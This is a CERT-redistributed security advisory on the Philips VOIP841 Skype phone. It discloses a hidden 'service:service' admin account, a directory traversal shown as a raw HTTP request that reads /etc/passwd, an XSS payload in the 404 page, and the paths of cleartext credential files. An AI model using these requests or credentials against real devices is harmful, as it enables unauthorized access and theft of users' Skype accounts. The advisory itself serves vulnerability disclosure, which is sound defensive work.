Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2008.0169 -- [Appliance]
Philips VOIP841 Multiple Vulnerabilities
15 February 2008
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: Philips VOIP841
Publisher: Secure Network
Operating System: Network Appliance
Impact: Administrator Compromise
Access Privileged Data
Read-only Data Access
Cross-site Scripting
Access: Remote/Unauthenticated
Original Bulletin:
http://www.securenetwork.it/ricerca/advisory/download/SN-2008-01.txt
- --------------------------BEGIN INCLUDED TEXT--------------------
Secure Network - Security Research Advisory
Vuln name: Philips VOIP841 Multiple Vulnerabilities
Systems affected: Philips VOIP841,
Firmware Version 1.0.4.50 and 1.0.4.80,
Web Server Version 1.5 (simple httpd)
Systems not affected: n/a
Severity: High
Local/Remote: Remote
Vendor URL: http://www.consumer.philips.com/consumer
Author(s): Luca "ikki" Carettoni - luca.carettoni@securenetwork.it
Vendor disclosure: 23rd January 2008
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 14th February 2008
Advisory number: SN-2008-01
Advisory URL: http://www.securenetwork.it/advisories/, http://www.ikkisoft.com
*** SUMMARY ***
VOIP841 is one of the first DECT cordless phones with an embedded Skype
client. Without a computer, it is possible to call directly other Skype
users or international numbers using SkypeOut as well as the regular PSTN
line. It is important to notice that it is Skype Certified and presented
as a best seller on the "Skype Shop" online.
Multiple vulnerabilities have been found in the latest version of this
VOIP phone, ranging from an hidden administration account to XSS and
directory traversal. Various consequences are associated with these issues,
such as theft of Skype authentication credentials stored in the phone and
information disclosure.
In order to exploit some vulnerabilities, a regular user should be
authenticated. However, using the hidden administration account it is
possible to easily bypass this security mechanism.
*** VULNERABILITY DETAILS ***
(a) Hidden Administration Account
The device provides a comfortable web management console, protected with
a basic HTML Authentication. The default account is set to
"Philips:voip841".
We discovered an hidden administration account which is probably used
during technical remote assistance. In the file "/var/cnxt/service", there
is the BASE64 string "c2VydmljZTpzZXJ2aWNl" which represents the account
"service:service".
Using these credentials it is possible to login into the web administration
console with admin privileges. The previous user enables also a "secret"
tab called [Change MAC Address] where it is possible (as the name implies)
to change the hardware address of the network interface.
(b) Directory Listing, Directory Traversal
The embedded webserver doesn't sanitize any kind of user input. The
directory listing option is also enabled. Using the previous account it
is possible to browse every directory on the device and to retrieve the
content of any file with a simple HTTP request.
Let's see a self explaining example:
jungle ikki $ telnet 192.168.1.10 80
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
GET /../../../../../../../../etc/passwd HTTP/1.0
Host: 192.168.1.10
Authorization: Basic c2VydmljZTpzZXJ2aWNl
HTTP/1.0 200 OK
Content-type: text/plain
Expires: Sat, 24 May 1980.7:00:00.GMT
Pragma: no-cache
Server: simple httpd 1.0
root:x:0:0:root:/root:/bin/bash
demo:x:5000:100:Demo User:/home/demo:/bin/bash
nobody:x:65534:65534:Nobody:/htdocs:/bin/bash
Connection closed by foreign host.
(c) Cross Site Scripting (XSS)
Due to the absence of input filters it is possible to inject scripting
code inside the 404 standard response page. In this way it is possible
to trigger XSS attacks with a simple HTTP request like the following:
GET /var/htdocs/<script>alert("XSS");</script> HTTP/1.0
Host: 192.168.1.10
<html><head><title>404 File Not Found</title></head>
<body>
httpd server: The requested URL
'/var/htdocs/<script>alert("XSS");</script>'
was not found on this server.
</body></html>
(d) Insecure Storage
Browsing the device filesystem, we have noticed the presence of sensitive
information stored in an insecure way.
Just to show the possible risks, we report the possibility to retrieve
Skype credentials used by the device and inserted by the user during the
configuration process. In the file "/var/jffs2/data/save.dat", the
embedded Skype client stores temporary information such as the Skype
account (username and password) in clear text.
Another issue is related to the change password procedure for the web
management console: every operation done on the web console is logged on
a temporary file present in the directory "/tmp". When an administrator
changes the web authentication password, the old and the new values are
revealed into the file "apply.log" generated by the cgi-bin called "apply".
###### CUT HERE ######
<22:02:11.940000> apply cgi start...
<22:02:11.940000> Content length : 64
<22:02:11.940000> btn_action=admin&edit_pwd1=ikki&edit_pwd2=ikki&rb_defaults=rb_no
<22:02:11.940000> 0 : [btn_action] = [admin]
<22:02:11.940000> 1 : [edit_pwd1] = [ikki]
<22:02:11.940000> 2 : [edit_pwd2] = [ikki]
<22:02:11.940000> 3 : [rb_defaults] = [rb_no]
<22:02:11.940000> Action : [4] admin
<22:02:11.940000> OldUser:philips:voip841
<22:02:11.940000> NewUser:ikki
<22:02:11.940000> Encoded:philips:ikki
###### CUT HERE ######
*** EXPLOIT ***
Attackers may exploit these issues through a common browser as explained
above.
*** FIX INFORMATION ***
n/a
*** WORKAROUNDS ***
n/a
*********************
*** LEGAL NOTICES ***
*********************
Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.
We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.
This advisory is copyright 2008 Secure Network S.r.l. Permission is hereby
granted for the redistribution of this alert, provided that it is not
altered except by reformatting it, and that due credit is given. It may
not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network
The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect, or
consequential loss or damage arising from use of, or reliance on, this
information.
If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.
E-mail: securenetwork@securenetwork.it
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 02 24126788
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
http://www.auscert.org.au/render.html?cid=1980
If you believe that your computer system has been compromised or attacked in
any way, we encourage you to let us know by completing the secure National IT
Incident Reporting Form at:
http://www.auscert.org.au/render.html?it=3192
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQCVAwUBR7TX+yh9+71yA2DNAQJKTgP/Yi9kzEfInFlOaScssy6dWad6c4XDcpBU
0sONLd3TaOPG4kWhfgovDKSH+M3Xeh/8f7sfI1OU0whc5KS334socLFdIwI7TIE5
+onEbQAa89/2EmDWj9xDvBaedWI3RYt/pmoxNOZ4OF2mdnIZcvfbOHesPS71EuCU
BBamYFVRUVA=
=+WBv
-----END PGP SIGNATURE-----